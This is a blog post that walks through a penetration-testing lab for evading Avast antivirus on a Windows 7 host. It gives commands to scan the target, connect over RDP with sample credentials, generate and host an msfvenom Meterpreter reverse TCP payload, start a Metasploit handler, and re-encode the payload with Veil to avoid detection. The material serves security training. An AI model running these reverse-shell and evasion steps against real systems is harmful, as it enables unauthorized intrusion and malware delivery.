CyberSecurity,  DevSecOps,  Firewall,  Kali Linux,  Malware,  Network

Bypassing AV – Avast, on a Windows 7

July 15, 2024 / 0 Comments

Bypassing Avast Antivirus: A Hands-On Guide

In today’s cybersecurity landscape, bypassing antivirus (AV) software is a critical skill for penetration testers and malicious actors alike. In this lab, we’ll explore how to bypass one of the popular AVs, Avast, on a Windows 7 machine using a variety of techniques and tools available in the penetration testing arsenal.

Lab Environment

You’ll need access to the following:

  • Kali Linux GUI instance
  • Windows 7 machine accessible via RDP at IP address 172.16.5.10

Objective

Bypass the latest version of Avast AV installed on the Windows 7 machine.

Tools Required

  • Veil Framework
  • UPX
  • Metasploit Framework
  • rdesktop
  • Web browser

Lab Steps

Step 1: Check Accessibility

First, ensure the Windows machine is reachable from your Kali instance:

ping -c3 172.16.5.10

Confirm connectivity to proceed.

Step 2: Identify Open Ports

Scan the Windows machine for open ports, especially RDP:

nmap 172.16.5.10

Ensure port 3389 (RDP) is open for remote access.

Step 3: Connect to Windows Machine

Use rdesktop to establish an RDP connection:

rdesktop -u aline -p soccer 172.16.5.10

Enter credentials when prompted to gain access.

Step 4: Check Avast AV

Confirm Avast AV is running on the Windows machine.

Step 5: Generate Reverse TCP Payload

Identify your attacker machine’s IP address:

ip addr

Generate a reverse TCP payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.101 LPORT=4444 -f exe > rTCP.exe

Step 6: Start HTTP Server

Host the payload on an HTTP server:

python3 -m http.server 80

Step 7: Start Reverse TCP Handler

In a separate terminal, initiate a Metasploit reverse TCP handler:

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.5.101
set LPORT 4444
exploit

Step 8: Attempt Payload Download

Navigate to the Windows machine and attempt to download the payload:

http://172.16.5.101/rTCP.exe

Observe Avast block the download due to detection.

Step 9: Temporarily Disable Avast

Disable Avast temporarily to proceed:

  • Access Avast from system tray > Menu > Settings > Protection > Core Shields > Disable Until I Turn It On Again > OK, STOP.

Step 10: Download and Execute Payload

Retry downloading the payload:

http://172.16.5.101/rTCP.exe

Execute the downloaded file on the Windows machine.

Step 11: Enable and Bypass Avast

Re-enable Avast and encode the payload using Veil Framework:

veil
use 1
generate

Host and download the encoded payload, and observe successful execution.

Conclusion

Bypassing Avast AV involves persistence and creativity in modifying payloads to evade detection. This lab provides a glimpse into the methodologies used in real-world scenarios. Remember, always use these skills ethically and with proper authorization.

Explore further with tools like Veil Framework, Metasploit, and techniques like payload encryption and packing to enhance evasion capabilities against different AV solutions.

References

Mastering AV evasion is an ongoing challenge, but with practice and understanding, you can enhance your cybersecurity skills significantly.

This blog post guides you through a practical approach to bypassing Avast AV, providing insights into the techniques and tools involved. It’s essential to stay informed and continuously practice these skills responsibly in controlled environments.

Note: Blog based on publicly available information.

Note: Blog based on publicly available information.

You May Also Like

Beyond the Hype: Understanding the Limitations of Quantum Computing

August 15, 2024

How to know information about IP from internal network

October 9, 2023

MAC Flooding: Understanding the Attack

January 30, 2024

Leave a Reply

Your email address will not be published. Required fields are marked *